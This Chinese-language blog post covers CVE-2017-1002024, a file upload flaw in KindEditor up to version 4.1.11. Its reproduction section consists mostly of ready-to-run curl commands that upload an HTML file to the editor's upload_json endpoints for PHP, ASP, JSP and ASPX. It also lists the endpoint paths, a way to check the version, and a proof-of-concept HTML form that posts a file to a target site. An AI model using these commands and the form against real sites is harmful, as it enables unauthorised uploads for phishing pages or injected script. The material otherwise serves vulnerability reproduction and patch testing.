(CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞
Published in:2022-05-25 |

(CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞

一、漏洞简介

漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中

二、漏洞影响

Kindeditor <=4.1.11

三、复现过程

1
2
3
4
5
6
7
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file


```返回值为路径

json文件地址

1
2
3
4
5
6
7
/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

上传路径

1
2
3
4
5
6
7
kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

查看版本信息

1
http://www.0-sec.org/kindeditor//kindeditor.js

构造poc

1
2
3
4
5
6
7
8
9
10
11

<html>
<head></head>
<body>
<form name="form" enctype="multipart/form-data" method="post" action="https://xxxxxxxxxxxx/static/school/tool/kindeditor/php/upload_json.php?dir=file">
<input type="file" name="imgFile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

正确的回显

错误的回显

Prev:
wpscan学习使用
Next:
beef安装使用